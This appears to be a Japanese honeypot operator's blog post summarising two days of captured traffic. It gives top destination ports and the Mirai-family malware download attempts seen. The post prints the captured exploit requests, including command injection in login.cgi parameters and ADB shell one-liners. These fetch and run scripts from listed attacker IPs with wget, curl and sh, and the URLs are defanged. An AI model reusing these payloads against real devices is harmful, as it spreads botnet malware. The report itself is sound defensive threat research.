ハニーポット簡易分析(14,15日目:8/21,22)
今回は二日分まとめての更新となります。
8月21日
検知数 6,679 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,587 | 42.15% | 調査行為 |
503 | intrinsa | 254 | 6.75% | 調査行為 |
3389 | RDP | 76 | 2.02% | 調査行為 |
1433 | Microsoft SQL Server | 75 | 1.99% | 調査行為 |
52869 | D-Link, Realtek SDK | 46 | 1.22% | マルウェアダウンロード |
8080 | PROXY | 43 | 1.14% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 40 | 1.06% | /conf へのアクセス |
8089 | ? | 34 | 0.90% | 調査行為 |
4369 | ? | 33 | 0.88% | 調査行為 |
83 | MIT ML Device | 33 | 0.88% | 調査行為 |
8月22日
検知数 6,734 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,493 | 35.31% | 調査行為 |
22 | SSH | 457 | 10.81% | 調査行為 |
1433 | Microsoft SQL Server | 99 | 2.34% | 調査行為 |
8080 | PROXY | 57 | 1.35% | 調査行為 |
3389 | RDP | 51 | 1.21% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 50 | 1.18% | /conf へのアクセス |
8081 | D-Link | 46 | 1.09% | マルウェアダウンロード |
81 | ? | 34 | 0.80% | 調査行為 |
3790 | quickbooksrds | 33 | 0.78% | 調査行為 |
21 | FTP | 32 | 0.76% | 調査行為 |
503ポートへのアクセスが増加しましたが、攻撃と思われるコードはないため、調査行為止まりの通信でした。
<マルウェアダウンロード>
①
POST /HNAP1/ HTTP/1[.]0
・wget hxxp://176[.]32[.]32[.]156/bin
・wget hxxp://50[.]115[.]166[.]136/bin
→Mirai系マルウェア
②
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
・wget -g 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi[.]sh
→Mirai系マルウェア
③
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://107[.]191[.]99[.]41/elf[.]mips
・wget hxxp://142[.]93[.]1[.]75/hoho[.]mips
・wget hxxp://209[.]97[.]143[.]112/bins/sora[.]mips
→Mirai系マルウェア
④
POST /wanipcn[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]112[.]150/mips
→Mirai系マルウェア
⑤
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1[.]1
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$ HTTP/1[.]1
→Mirai系マルウェアと推測
⑥
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
・shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs[.]
→リンク先ダウンロード不可
マルウェアの傾向も変わっておらず、基本的にはMirai系のマルウェアとなります。
以上、簡易分析となります。